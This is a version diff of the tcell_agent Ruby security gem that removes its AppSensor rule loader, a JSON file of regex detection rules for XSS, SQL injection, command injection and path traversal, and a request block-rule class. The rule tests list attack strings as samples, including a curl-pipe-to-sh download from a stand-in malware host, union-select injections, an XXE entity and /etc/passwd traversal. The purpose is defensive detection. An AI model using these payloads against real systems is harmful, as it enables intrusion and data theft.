tcell_agent 0.4.0 → 1.0.0

data/lib/tcell_agent/appsensor/rules/appsensor_rule_manager.rb

@@ -1,49 +0,0 @@
-require 'singleton'
-require 'tcell_agent/appsensor/rules/appsensor_rule_set'
-
-module TCellAgent
-
-  class AppSensorRuleManager
-
-    include Singleton
-
-    attr_accessor :rule_info
-
-    def initialize
-      @rule_info = {}
-
-      load_default_rules_file
-    end
-
-    def load_default_rules_file
-      filename = File.join(File.dirname(__FILE__), "baserules.json")
-      load_rules_file(filename)
-    end
-
-    def load_rules_file(filename)
-      @rule_info = {}
-
-      if File.file?(filename)
-        rules_from_file = JSON.parse(File.open(filename).read)
-        rule_types = rules_from_file.fetch("sensors", {})
-
-        rule_types.each do |sensor_name, sensor_config|
-          rule_set = AppSensorRuleSet.new()
-          rule_set.set_safe_pattern_from_string(sensor_config.fetch("safe_pattern", nil))
-
-          sensor_config.fetch("patterns", []).each do |pattern_config|
-            rule_set.add_pattern_from_dict(pattern_config)
-          end
-
-          @rule_info[sensor_name] = rule_set
-        end
-      end
-    end
-
-    def get_ruleset_for(rule_type)
-      @rule_info.fetch(rule_type, nil)
-    end
-
-  end
-
-end

data/lib/tcell_agent/appsensor/rules/appsensor_rule_set.rb

@@ -1,67 +0,0 @@
-module TCellAgent
-
-  class AppSensorRulePattern
-    attr_accessor :pattern_id, :pattern_regex, :enabled
-    def initialize(pattern_id, pattern_regex, enabled)
-      @pattern_id = pattern_id
-      @pattern_regex = pattern_regex
-      @enabled = enabled
-    end
-  end
-
-  class AppSensorRuleSet
-    attr_accessor :safe_pattern, :patterns
-
-    def initialize()
-      @safe_pattern = nil
-      @patterns = []
-    end
-
-    def check_violation(param_name, param_value, active_pattern_ids, v1_compatability_enabled)
-      return nil if param_value.nil? || (@safe_pattern && param_value.match(@safe_pattern))
-
-      @patterns.each do |pattern|
-        next if pattern.nil? || pattern.enabled == false
-
-        if v1_compatability_enabled || active_pattern_ids.include?(pattern.pattern_id)
-          pattern_result = param_value.match(pattern.pattern_regex)
-
-          if pattern_result
-            return {"param" => param_name, "value" => param_value, "pattern" => pattern.pattern_id}
-          end
-        end
-      end
-
-      return nil
-    rescue
-      return nil
-    end
-
-    def add_pattern_from_dict(rule_dict)
-      return unless rule_dict
-
-      pattern_id = rule_dict.fetch("id", nil)
-      pattern = rule_dict.fetch("ruby", nil)
-      if pattern == nil
-        pattern = rule_dict.fetch("common", nil)
-      elsif pattern == "disabled"
-        return
-      end
-
-      return if pattern_id == nil or pattern == nil
-
-      pattern_regex = Regexp.new(pattern, Regexp::MULTILINE | Regexp::IGNORECASE)
-      enabled = rule_dict.fetch("enabled", true)
-
-      rule_pattern = AppSensorRulePattern.new(pattern_id, pattern_regex, enabled)
-      @patterns.push(rule_pattern)
-    end
-
-    def set_safe_pattern_from_string(safe_pattern_str)
-      if safe_pattern_str != nil
-        @safe_pattern = Regexp.new(safe_pattern_str)
-      end
-    end
-  end
-
-end

data/lib/tcell_agent/appsensor/rules/baserules.json

@@ -1,467 +0,0 @@
-{
-  "version": "20171205",
-  "sensors": {
-    "xss": {
-      "patterns": [
-        {
-          "title": "Basic Injection",
-          "sophistication": 1,
-          "common": "(?:<(script|iframe|embed|frame|frameset|object|img|applet|body|html|style|layer|link|ilayer|meta|bgsound))",
-          "tests": {
-            "shouldFind": [
-              "\n\n<scRipT>document.write(1)</script>",
-              "<body onload=\"abc\">",
-              "<script>alert(123)</script>",
-              "<script>alert(\"hellox world\");</script>",
-              "9<script/src=http/attacker.com>"
-            ],
-            "shouldIgnore": [
-              "<h1>hi</h1>",
-              "Bob",
-              "Script"
-            ]
-          },
-          "id": "1"
-        },
-        {
-          "title": "Alert or Event XSS",
-          "sophistication": 2,
-          "common": "(?:(alert|on\\w+\\s*=|function\\s+\\w+)\\s*\\(\\s*(['+\\d\\w](,?\\s*['+\\d\\w]*)*)*\\s*\\))",
-          "tests": {
-            "shouldFind": [
-              "<input onmouseover='alert(1)'>",
-              "<input/onmouseover='alert(1)'>"
-            ],
-            "shouldIgnore": [
-              "Email de la personne (action du front)",
-              "<h1>hi</h1>",
-              "()",
-              "Bob",
-              "Sammy"
-            ]
-          },
-          "id": "2"
-        },
-        {
-          "title": "Attribute Breaks",
-          "sophistication": 3,
-          "common": "(?:\"+.*[<=]\\s*\"[^\"]+\")|(?:\"\\s*\\w+\\s*=)|(?:>\\w=/)|(?:#.+\\)[\"\\s]*>)|(?:\"\\s*(?:src|style|on\\w+)\\s*=\\s*\")|(?:[^\"]?\"[,;\\s]+\\w*[\\[\\(])(?:^>[\\w\\s]*</?\\w{2,}>)",
-          "tests": {
-            "shouldFind": [
-              "<input src=\"b\" onmouseover=\"alert(1)\" test=\"abc\">"
-            ],
-            "shouldIgnore": [
-              "<h1>hi</h1>",
-              "<i class=\"test\">test</i>",
-              "Bob",
-              "Sammy",
-              "<i>",
-              "onmouseover",
-              "\"alert(1)\""
-            ]
-          },
-          "id": "4"
-        },
-        {
-          "title": "Basic Obfuscation",
-          "sophistication": 3,
-          "common": "(?:[\".]script\\s*\\()|(?:\\$\\$?\\s*\\(\\s*[\\w\"])|(?:/[\\w\\s]+/\\.)|(?:=\\s*/\\w+/\\s*\\.)|(?:(?:this|window|top|parent|frames|self|content)\\[\\s*[(,\"]*\\s*[\\w\\$])|(?:,\\s*new\\s+\\w+\\s*[,;)])",
-          "tests": {
-            "shouldFind": [
-              ",YAHOO.util.Get.script(\"http://ha.ckers.org/xss.js\")"
-            ],
-            "shouldIgnore": [
-              "<h1>hi</h1>",
-              "<i class=\"test\">test</i>",
-              "Bob",
-              "Sammy",
-              "<i>",
-              "onmouseover",
-              "\"alert(1)\""
-            ]
-          },
-          "id": "5"
-        },
-        {
-          "title": "Common Concatenation",
-          "sophistication": 3,
-          "common": "(?:=\\s*\\w+\\s*\\+\\s*\")|(?:\\+=\\s*\\(\\s\")|(?:!+\\s*[\\d.,]+\\w?\\d*\\s*\\?)|(?:=\\s*\\[\\s*\\])|(?:\"\\s*\\+\\s*\")|(?:[^\\s]\\[\\s*\\d+\\s*\\]\\s*[;+])|(?:\"\\s*[&|]+\\s*\")|(?:/\\s*\\?\\s*\")|(?:/\\s*\\)\\s*\\[)|(?:\\d\\?.+:\\d)|(?:\\]\\s*\\[\\W*\\w)",
-          "tests": {
-            "shouldFind": [
-              "=a+\"",
-              "+=( \"",
-              "! 1,000.0a?",
-              "= [ ]",
-              "\" + \"",
-              "#[ 1 ] ;",
-              "^[ 1 ] +",
-              "\" & \"",
-              "\" || \"",
-              "/ ? \"",
-              "/ ) [",
-              "1?a:1",
-              "] [$a",
-              "= werewr + \""
-            ],
-            "shouldIgnore": [
-              "<h1>hi</h1>",
-              "<i class=\"test\">test</i>",
-              "Bob",
-              "Sammy",
-              "<i>",
-              "onmouseover",
-              "http://127.0.0.1:4000/contrib?file=/etc/passwd",
-              "e=/",
-              "\"alert(1)\""
-            ]
-          },
-          "id": "6"
-        },
-        {
-          "title": "IFrame Tag Injection",
-          "sophistication": 1,
-          "common": "<iframe.*",
-          "tests": {
-            "shouldFind": [
-              "Sam\n<h3><iframe/src=\\\\malware.xcc/>"
-            ],
-            "shouldIgnore": [
-              "<h1>hi</h1>",
-              "Bob",
-              "Script"
-            ]
-          },
-          "id": "7"
-        },
-        {
-          "title": "JavaScript URL",
-          "sophistication": 1,
-          "common": "\\b(src|href|lowsrc|url|content)\\b\\W*?\\bjavascript:",
-          "tests": {
-            "shouldFind": [
-              "\" href=\"javascript:alert(1)\"",
-              "' url='javascript:alert(1)'",
-              "<input type=image src=javascript:",
-              "<meta http-equiv=\"refresh\" content=\"javascript:..."
-            ],
-            "shouldIgnore": [
-              "<h1>hi</h1>",
-              "Bob",
-              "Script"
-            ]
-          },
-          "id": "8"
-        }
-      ]
-    },
-    "cmdi": {
-      "safe_pattern": "^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
-      "patterns": [
-        {
-          "title": "Common Remote Attempts",
-          "sophistication": 2,
-          "id": "1",
-          "common": "(?:[;\\|`]\\W*?\\bcc|[&\\|;]\\W*\\b\\b(wget|curl))\\b|/cc(?:['\"\\|;`\\-\\s]|$)",
-          "tests": {
-            "shouldFind": [
-              "|wget https://malware.com",
-              "& curl https://malware.com/run_me.sh|sh"
-            ],
-            "shouldIgnore": [
-              "curl/7.54.0",
-              "Wget/1.17.1 (linux-gnu)",
-              "aB--D_C=",
-              "union soldier",
-              "a",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2",
-              "divide and conquer"
-            ]
-          }
-        },
-        {
-          "title": "Common Command Attempts",
-          "sophistication": 1,
-          "id": "2",
-          "common": "(?:\\b(?:(?:n(?:et(?:\\b\\W+?\\blocalgroup|\\.exe)|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo\\b\\W*?\\by+)\\b|c(?:md(?:(?:\\.exe|32)\\b|\\b\\W*?/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[;\\|`]\\W*?\\b(?:(?:c(?:h(?:grp|mod|own|sh)|md|pp)|p(?:asswd|ython|erl|ing|s)|ruby|node|n(?:asm|map|c)|f(?:inger|tp)|(?:kil|mai)l|(?:xte)?rm|ls(?:of)?|telnet|uname|echo|id)\\b|g(?:\\+\\+|cc\b)))",
-          "tests": {
-            "shouldFind": [
-              "test|echo hi",
-              "abc;nc",
-              "`ls /etc/passwd`",
-              "`python /my/code`",
-              "`ruby /my/code`",
-              "`node /my/code`"
-            ],
-            "shouldIgnore": [
-              "aB--D_C=",
-              "union soldier",
-              "a",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "divide and conquer",
-              "david;bob",
-              "python",
-              "ruby",
-              "node"
-            ]
-          }
-        },
-        {
-          "title": "XML Injection Attempts",
-          "sophistication": 1,
-          "id": "3",
-          "common": "<\\?xml.*<!ENTITY",
-          "tests": {
-            "shouldFind": [
-              "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM \"file:///dev/random\" >]><foo>&xxe;</foo>"
-            ],
-            "shouldIgnore": [
-              "aB--D_C=",
-              "union soldier",
-              "a",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "divide and conquer",
-              "david;bob",
-              "python",
-              "ruby",
-              "node"
-            ]
-          }
-        }
-      ]
-    },
-    "sqli": {
-      "safe_pattern": "^[a-zA-Z0-9_\\s\\r\\n\\t]*$",
-      "patterns": [
-        {
-          "title": "Common Encoding Obfuscations",
-          "sophistication": 3,
-          "common": "(?:(?:\\d[\"'`\u00b4\u2019\u2018]\\s+[\"'`\u00b4\u2019\u2018]\\s+\\d)|(?:^admin\\s*?[\"'`\u00b4\u2019\u2018]|(/\\*)+[\"'`\u00b4\u2019\u2018]+\\s?(?:--|#|/\\*|\\{)?)|(?:[\"'`\u00b4\u2019\u2018]\\s*?\\b(x?or|div|like|between|and)\\b\\s*?[+<>=(),-]\\s*?[\\d\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\s*?[^\\w\\s]?=\\s*?[\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\W*?[+=]+\\W*?[\"'`\u00b4\u2019\u2018])|(?:[\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=+-]+.*?[\"'`\u00b4\u2019\u2018(].*?$)|(?:[\"'`\u00b4\u2019\u2018]\\s*?[!=|][\\d\\s!=]+.*?\\d+$)|(?:[\"'`\u00b4\u2019\u2018]\\s*?like\\W+[\\w\"'`\u00b4\u2019\u2018(])|(?:\\sis\\s*?0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:[\"'`\u00b4\u2019\u2018][<>~]+[\"'`\u00b4\u2019\u2018]))",
-          "tests": {
-            "shouldFind": [
-              "') or ('1'='1--",
-              "') or ('1'='1--",
-              "1 OR '1'!=0",
-              "aa' LIKE md5(1) or '1"
-            ],
-            "shouldIgnore": [
-              "aB--D_C=",
-              "union soldier",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "divide and conquer"
-            ]
-          },
-          "id": "1"
-        },
-        {
-          "title": "Common Probes/Executions",
-          "sophistication": 1,
-          "common": "\\b(?:having)\\b\\s+(\\d{1,10}|'[^=]{1,10}')\\s*?[=<>]|(?:\\bexecute(\\s{1,5}[\\w\\.$]{1,5}\\s{0,3})?\\()|\\bhaving\\b ?(?:\\d{1,10}|['\"][^=]{1,10}['\"]) ?[=<>]+|(?:\\bcreate\\s+?table.{0,20}?\\()|(?:\\blike\\W*?char\\W*?\\()|(?:(?:(select(.*?)case|from(.*?)limit|order\\sby)))|exists\\s(\\sselect|select\\Sif(null)?\\s\\(|select\\Stop|select\\Sconcat|system\\s\\(|\\b(?:having)\\b\\s+(\\d{1,10})|'[^=]{1,10}')",
-          "id": "2"
-        },
-        {
-          "title": "Conditional Attempts",
-          "sophistication": 3,
-          "common": "(?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[^\\s]+\\s*[^\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~])",
-          "tests": {
-            "shouldFind": [
-              "' or id= 1 having 1 #1 !"
-            ],
-            "shouldIgnore": [
-              "aB--D_C=",
-              "union soldier",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "divide and conquer"
-            ]
-          },
-          "id": "7"
-        },
-        {
-          "title": "Union Attempts",
-          "sophistication": 3,
-          "common": "(?:union\\s*(?:all|distinct|[(!@]*)\\s*[(\\[]*\\s*select)|(?:\\w+\\s+like\\s+\")|(?:like\\s*\"%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\()",
-          "tests": {
-            "shouldFind": [
-              "'union select all 1,2,x,x,x,x —-",
-              "'union select 1,2,3,x,x,x,x,@@version,x–-",
-              "'union select UTL_INADDR.get_host_address,null,null,null,null from dual–-"
-            ],
-            "shouldIgnore": [
-              "aB--D_C=",
-              "union soldier",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "divide and conquer"
-            ]
-          },
-          "id": "8"
-        },
-        {
-          "title": "SQL Comment Sequence",
-          "sophistication": 1,
-          "common": "([';]--|--[\\s\\r\\n\\v\\f]|(?:'[\\s\\r\\n\\v\\f]*--[^-]*?-)|#[\\s\\r\\n\\v\\f]*$|;?\\\\x00)",
-          "tests": {
-            "shouldFind": [
-              "'--",
-              "1=1;\\x00",
-              "admin\" #"
-            ],
-            "shouldIgnore": [
-              "aB--D_C=",
-              "union soldier",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "-----BEGIN PGP PUBLIC KEY BLOCK-----",
-              "divide and conquer",
-              "Order ID# 2345",
-              "/url/with/#/hash"
-            ]
-          },
-          "id": "3"
-        },
-        {
-          "title": "Extraction Attempts",
-          "sophistication": 1,
-          "common": "(?:(?:@.+=\\s*?\\(\\s*?select)|(?:\\d+\\s*?(x?or|div|like|between|and)\\s*?\\d+\\s*?[\\-+])|(?:/\\w+;?\\s+(?:having|and|x?or|div|like|between|and|select)\\W)|(?:\\d\\s+group\\s+by.+\\()|(?:(?:;|#|--)\\s*?(?:drop|alter))|(?:(?:;|#|--)\\s*?(?:update|insert)\\s*?\\w{2,})|(?:[^\\w]SET\\s*?@\\w+)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\|\\||\\&\\&)[\\s(]+\\w+[\\s)]*?[!=+]+[\\s\\d]*?[\"'`\u00b4\u2019\u2018=()]))",
-          "tests": {
-            "shouldFind": [
-              "';Drop table users"
-            ],
-            "shouldIgnore": [
-              "aB--D_C=",
-              "union soldier",
-              "select",
-              "James O'Connor",
-              "Like this or that",
-              "divide and conquer",
-              "Sam; James"
-            ]
-          },
-          "id": "4"
-        }
-      ]
-    },
-    "fpt": {
-      "patterns": [
-        {
-          "title": "General Traversal",
-          "sophistication": 2,
-          "common": "(?:(?:/|\\\\)?\\.+(/|\\\\)(?:\\.*))|(?:\\w+\\.exe\\??\\s)|(?:;\\s*\\w+\\s*/[\\w*-]+/)|(?:\\d\\.\\dx\\|)|(?:%(?:c0\\.|af\\.|5c\\.))|(?:/(?:%2e){2})",
-          "tests": {
-            "shouldFind": [
-              "/.../.../.../.../.../",
-              "\\0../../../../../../etc/passwd",
-              "../../../../../../etc/shadow"
-            ],
-            "shouldIgnore": [
-              "Julie",
-              "The quick'o brown... fox.. was. /there"
-            ]
-          },
-          "id": "1"
-        },
-        {
-          "title": "Common System Probing",
-          "sophistication": 4,
-          "common": "(?:%c0%ae/)|(?:(?:/|\\\\)(conf|usr|etc|proc|opt|s?bin|local|dev|tmp|kern|[br]oot|sys|system|windows|winnt|program|%[a-z_-]{3,}%)(?:/|\\\\))|(?:(?:/|\\\\)inetpub|localstart\\.asp|boot\\.ini)",
-          "tests": {
-            "shouldFind": [
-              "/./././././././././././boot.ini",
-              "/home/apache/conf/httpd.conf"
-            ],
-            "shouldIgnore": [
-              "/Home/Index",
-              "Julie",
-              "The quick'o brown... fox.. was. /there"
-            ]
-          },
-          "id": "2"
-        },
-        {
-          "title": "Attempt for /etc/passwd, shadow",
-          "sophistication": 1,
-          "common": "(?:etc/\\W*passwd)|(?:etc/\\W*shadow)",
-          "tests": {
-            "shouldFind": [
-              "/etc/passwd"
-            ],
-            "shouldIgnore": [
-              "Julie",
-              "The quick'o brown... fox.. was. /there"
-            ]
-          },
-          "id": "3"
-        },
-        {
-          "title": "Spider svn entries disclosure",
-          "sophistication": 1,
-          "common": ".svn/(./)*entries",
-          "tests": {
-            "shouldFind": [
-              "http://mysite.tld/folder/.svn/entries",
-              "http://mysite.tld/folder/.svn/./entries"
-            ],
-            "shouldIgnore": [
-              "mysite.tld/folder/entries/svn/"
-            ]
-          },
-          "id": "4"
-        }
-      ]
-    },
-    "nullbyte": {
-      "patterns": [
-        {
-          "title": "Any Null Byte",
-          "sophistication": 1,
-          "id": "1",
-          "common": "\\x00",
-          "tests": {
-            "shouldFind": [
-              "Duh\u0000",
-              "\u0000",
-              "\n\rOh\u0000No"
-            ],
-            "shouldIgnore": [
-              "Julie",
-              "The quick'o brown... fox.. was. /there"
-            ]
-          }
-        }
-      ]
-    },
-    "retr": {
-      "patterns": [
-        {
-          "title": "Any Line-Break Character",
-          "sophistication": 1,
-          "id": "1",
-          "common": "(\\n|\\r)",
-          "tests": {
-            "shouldFind": [
-              "Duh\r",
-              "\r\n",
-              "\n\rOh\\0No"
-            ],
-            "shouldIgnore": [
-              "Julie",
-              "The quick'o brown... fox.. was. /there"
-            ]
-          }
-        }
-      ]
-    }
-  }
-}

data/lib/tcell_agent/patches/block_rule.rb

@@ -1,93 +0,0 @@
-require 'tcell_agent/patches/sensors_matcher'
-
-module TCellAgent
-  module Patches
-
-    class BlockRule
-      ACTIONS_TO_RESPONSES = {
-        "block_403s" => 403
-      }
-
-      attr_accessor :ips, :rids, :sensors_matcher, :action, :exact_blocked_paths, :starts_with_blocked_paths
-
-      def initialize(ips, rids, sensors_matcher, action, exact_blocked_paths, starts_with_blocked_paths)
-        @ips = ips
-        @rids = rids
-        @sensors_matcher = sensors_matcher
-        @action = action
-        @exact_blocked_paths = exact_blocked_paths
-        @starts_with_blocked_paths = starts_with_blocked_paths
-      end
-
-      def resp
-        ACTIONS_TO_RESPONSES[@action]
-      end
-
-      def block?(meta_data)
-        if @exact_blocked_paths.size > 0 || @starts_with_blocked_paths.size > 0
-          if meta_data.path
-            return true if @exact_blocked_paths.include?(meta_data.path)
-
-            return true if @starts_with_blocked_paths.any? do |blocked_path|
-              meta_data.path.start_with?(blocked_path)
-            end
-          end
-
-          return false
-        else
-          return false unless @ips.empty? || @ips.include?(meta_data.remote_address)
-
-          return false unless @rids.empty? || @rids.include?(meta_data.route_id)
-
-          return @sensors_matcher.any_matches?(meta_data)
-        end
-      end
-
-      def self.from_json(rule_json)
-        action = rule_json.fetch("action", "block_403s")
-
-        if ACTIONS_TO_RESPONSES.has_key?(action)
-          ips = Set.new(rule_json.fetch("ips", []))
-          rids = Set.new(rule_json.fetch("rids", []))
-
-          exact_blocked_paths = Set.new
-          starts_with_blocked_paths = []
-          rule_json.fetch("paths", []).each do |path_predicate|
-            if path_predicate.fetch("exact", nil)
-              exact_path = TCellAgent::Utils::Strings.remove_trailing_slash(path_predicate["exact"])
-              exact_blocked_paths.add(exact_path)
-              if exact_path.size > 1
-                exact_blocked_paths.add(exact_path + "/")
-              end
-
-            elsif path_predicate.fetch("starts_with", nil)
-              starts_with_blocked_paths.push(path_predicate["starts_with"])
-            end
-          end
-
-          if ips.empty? && rids.empty? && exact_blocked_paths.size == 0 && starts_with_blocked_paths.size == 0
-            TCellAgent.logger.error("Patches Policy block rule cannot be global. Specify either ips and/or route ids or blocked paths")
-
-            return nil
-          end
-
-          sensors_matcher = SensorsMatcher.from_json(rule_json.fetch("sensor_matches", {}))
-
-          return BlockRule.new(
-            ips,
-            rids,
-            sensors_matcher,
-            action,
-            exact_blocked_paths,
-            starts_with_blocked_paths)
-
-        else
-          TCellAgent.logger.error("Patches Policy action not supported: #{action}")
-
-          return nil
-        end
-      end
-    end
-
-  end
-end